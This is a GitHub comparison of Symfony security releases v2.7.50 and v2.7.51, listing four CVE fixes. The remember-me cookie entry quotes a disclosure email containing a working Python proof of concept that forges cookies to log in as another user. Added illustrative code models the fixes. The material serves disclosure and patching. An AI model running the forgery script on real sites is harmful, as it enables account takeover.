Comparing changes
base repository: symfony/symfony
base: v2.7.50
head repository: symfony/symfony
compare: v2.7.51
- 7 commits
- 11 files changed
- 2 contributors
Commits on Apr 16, 2019
security #cve-2019-10913 [HttpFoundation] reject invalid method override (nicolas-grekas)

This PR was merged into the 2.7 branch.

Discussion
----------

[HttpFoundation] reject invalid method override

| Q             | A
| ------------- | ---
| Branch?       | 3.4
| Bug fix?      | yes
| New feature?  | no
| BC breaks?    | no
| Deprecations? | no
| Tests pass?   | yes
| Fixed tickets | -
| License       | MIT
| Doc PR        | -

From https://www.intigriti.com/company/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn7LV-k0ZJ4JlDGSPAaBG1sG1aNinWbVYRos8ldmLPCMSPdHLrwLufz8lXoJ-UNS3XW1_Xkxc7u9rIaENVJ_-nQV_uic7D1tmRhB6PFiBkRgBA

About `Request::getMethod`:

> There will be developers, who expect the http method to be valid and therefore will use the return value unescaped in sql, html or other dangerous places.

This is what this PR improves, forcing only ASCII letters in overridden methods.

> It is possible to set the header to "GET", "HEAD", "OPTIONS" and "TRACE". Because of this, the method Request::isMethodSafe() returns true, although the actual http method is post.

I don't think this creates any issue: not fixed.

> Normally, if you try to provide a request body in a GET-Request, the web server discards the request body. This security functionality can be completely bypassed through this. [...] Recommendation: Remove the parsed body params from the request object, if a method without a body is set.

I don't think this is valid: actually we *do* populate `$request->request` with the body of GET requests when some is sent.

> Even if very rare, some users still use old browsers, where CORS is not available. Or a server admin allowed headers to be cross origin. In those cases this functionality enables CSRF-Attacks, if the developer trusts the http method. (E.g. Shopware does this).

I don't understand this, not addressed.

ping @michaelcullum if you want to answer the person. And others to review :)

Commits
-------

6ce9991392 [HttpFoundation] reject invalid method override
Commit 722efa1
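As an added illustration of the rule this fix enforces (example code, not Symfony's own `Request` implementation), here is a small Python model of method-override resolution that accepts only ASCII letters as an override; the lookup order, the header name normalization and the exception type are assumptions of this example.

```python
import re

# An override must consist of ASCII letters only ("forcing only ASCII letters in
# overridden methods"). fullmatch is used deliberately: a trailing-newline match that
# a bare `$` anchor would allow in some regex engines must not slip through.
ASCII_LETTERS = re.compile(r"[A-Za-z]+")
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}  # RFC 7231 "safe" methods


class InvalidMethodOverride(ValueError):
    """Raised for an override that is not purely ASCII letters (this example's choice)."""


def is_valid_override(value):
    """True only for non-empty, purely ASCII-letter override values."""
    return bool(ASCII_LETTERS.fullmatch(value))


def resolve_method(transport_method, headers=None, body=None, query=None):
    """Return (effective_method, transport_method).

    Assumed lookup order for this example: X-HTTP-METHOD-OVERRIDE header (keys given
    upper-case), then a `_method` body parameter, then a `_method` query parameter.
    Only a POST may be overridden; the result is upper-cased like Symfony does.
    """
    headers, body, query = headers or {}, body or {}, query or {}
    method = transport_method.upper()
    if method != "POST":
        return method, method
    override = (headers.get("X-HTTP-METHOD-OVERRIDE")
                or body.get("_method") or query.get("_method"))
    if not override:
        return method, method
    if not is_valid_override(override):
        raise InvalidMethodOverride(f"invalid method override {override!r}")
    return override.upper(), method


def audit_override(transport_method, headers=None, body=None, query=None):
    """Defender's view of one request: was an override applied, and did it turn a POST
    into a method that isMethodSafe() would report as safe (the discrepancy the report notes)?"""
    effective, transport = resolve_method(transport_method, headers, body, query)
    return {"effective": effective, "overridden": effective != transport,
            "looks_safe_but_was_post": effective in SAFE_METHODS and transport == "POST"}
```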
security #cve-2019-10911 [Security] Add a separator in the remember me cookie hash (pborreli)

This PR was merged into the 2.7 branch.

Discussion
----------

[Security] Add a separator in the remember me cookie hash

Fabien found this issue reported back in 2013 but it was never resolved. Pascal (@pborreli) did the original patch.

> -------- Original Message --------
> Subject: No structure in remember me MAC
> Date: Tue, 4 Jun 2013 09:46:21 +0100
> From: Jon Cave <[email protected]>
> To: [email protected]
>
> I have discovered a vulnerability in the Symfony framework that affects version 2.3 and all other 2.x releases. The vulnerability would allow an attacker to authenticate as a privileged user on sites with user registration and remember me login functionality enabled.
>
> The problem is that there is no structure in the data that is passed to the hash function when generating a MAC for remember me cookies. From Symfony\Component\Security\Http\RememberMe\TokenBasedRememberMeServices::generateCookieHash():
>
>     return hash('sha256', $class.$username.$expires.$password.$this->getKey());
>
> This means that there are many inputs that result in the same hash. For example, a user can register with username "admin9" and receive the following cookie: `<class>:admin9:1370334467:<hash>` where `<hash>` is hash('sha256', "<class>admin91370334467<password><key>"). This cookie can then be modified to be: `<class>:admin:91370334467:<hash>` where `<hash>` is the same value as before. The application will load the "admin" user and recognise the provided hash as valid! (NB: I left out some base64 encoding to make things more obvious.)
>
> The solution to this is to use the same separator when generating the hash as is done when encoding the cookie, e.g.:
>
>     return hash('sha256', $class . ':' . $username . ':' . $expires . ':' . $password . ':' . $this->getKey());
>
> It would also be a good idea to switch to using hash_hmac():
>
>     return hash_hmac('sha256', $class . ':' . $username . ':' . $expires . ':' . $password, $this->getKey());
>
> This is because HMAC is a stronger MAC construction than the secret suffix one currently being used [1].
>
> Let me know if you have any questions.
>
> Cheers,
> Jon
> http://joncave.co.uk/
> @joncave
>
> [1] http://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/
>
> Proof of concept code to perform the attack given a valid cookie to modify:
>
> ```python
> import base64
> import requests
> import sys
>
> if __name__ == "__main__":
>     if len(sys.argv) != 3:
>         print "COOKIE URL"
>         sys.exit(1)
>
>     cookie = sys.argv[1]  # Current cookie
>     url = sys.argv[2]     # URL
>
>     cls, name, expires, mac = base64.b64decode(cookie).split(":")
>
>     # Tamper
>     name = base64.b64decode(name)
>     expires = name[-1] + expires
>     name = base64.b64encode(name[:-1])
>
>     # Reconstruct
>     cookie = ":".join([cls, name, expires, mac])
>
>     print "Using cookie: " + cookie
>     print
>
>     cookies = {"REMEMBERME": base64.b64encode(cookie)}
>     print requests.get(url, cookies=cookies).text
> ```

Commits
-------

6356982017 [Security] Add a separator in the remember me cookie hash
Commit 2681a5f
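To make the report's collision concrete, here is an added Python model (example code, not Symfony's implementation) of both MAC constructions behind a toy cookie verifier: the unseparated legacy hash accepts a cookie whose username/expires boundary has been shifted, while the separated HMAC from the report rejects it. The class name, secret, user table and the assumption that both accounts carry the same stored password value are constructed for this example.

```python
import base64
import hashlib
import hmac

# Constructed sample data, not real Symfony values. Both accounts share one stored
# password value, a simplification so that only the field boundaries differ.
SECRET_KEY = "constructed-secret"
USER_CLASS = "App\\Entity\\User"
USERS = {"admin": "stored-password-value", "admin9": "stored-password-value"}


def legacy_hash(cls, username, expires, password, key):
    # Pre-fix scheme: bare concatenation, so field boundaries are ambiguous.
    return hashlib.sha256(f"{cls}{username}{expires}{password}{key}".encode()).hexdigest()


def fixed_hash(cls, username, expires, password, key):
    # The report's recommendation: the same ':' separator as the cookie, under HMAC.
    msg = ":".join([cls, username, str(expires), password]).encode()
    return hmac.new(key.encode(), msg, hashlib.sha256).hexdigest()


def encode_cookie(cls, username, expires, mac):
    # Cookie layout from the report: class:base64(username):expires:mac, all base64-encoded.
    b64name = base64.b64encode(username.encode()).decode()
    return base64.b64encode(":".join([cls, b64name, str(expires), mac]).encode()).decode()


def decode_cookie(cookie):
    cls, b64name, expires, mac = base64.b64decode(cookie).decode().split(":")
    return cls, base64.b64decode(b64name).decode(), expires, mac


def issue_cookie(username, expires, hasher):
    mac = hasher(USER_CLASS, username, expires, USERS[username], SECRET_KEY)
    return encode_cookie(USER_CLASS, username, expires, mac)


def verify_cookie(cookie, hasher):
    # Returns the authenticated username, or None when the MAC does not match.
    cls, username, expires, mac = decode_cookie(cookie)
    if username not in USERS:
        return None
    expected = hasher(cls, username, expires, USERS[username], SECRET_KEY)
    return username if hmac.compare_digest(expected, mac) else None


def shift_boundary(cookie):
    # The boundary shift from the report: the username's last character moves into expires.
    cls, username, expires, mac = decode_cookie(cookie)
    return encode_cookie(cls, username[:-1], username[-1] + expires, mac)


def compare_schemes(username="admin9", expires=1370334467):
    # Who does each scheme authenticate after the same shift? Returns ("admin", None).
    return tuple(verify_cookie(shift_boundary(issue_cookie(username, expires, h)), h)
                 for h in (legacy_hash, fixed_hash))
```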
security #cve-2019-10909 [FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909 (stof)

This PR was merged into the 2.7 branch.

Discussion
----------

[FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909

https://www.intigriti.com/researcher/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn4K0Hgfyo6ynNDaSmw63JqRiMJ1Arv1xOxeLFRsv7xVI0MAspfOj8pKsT-ruB6Pfx5HvSOKt0UzPUqqpEWtGNo2kb3xuLP19uhpuMvrZOXnDA

Commits
-------

e645e2aa7e Fix XSS issues in the form theme of the PHP templating engine
Commit 783ef2f
security #cve-2019-10910 [DI] Check service IDs are valid (nicolas-grekas)

This PR was merged into the 2.7 branch.

Discussion
----------

[DI] Check service IDs are valid

Based on #87

Commits
-------

0671884f41 [DI] Check service IDs are valid
Commit 789a34a
Commits on Apr 17, 2019
- Commit 343865d
- Commit 2636414
- Commit 20f9c87
You can try running this command locally to see the comparison on your machine:
git diff v2.7.50...v2.7.51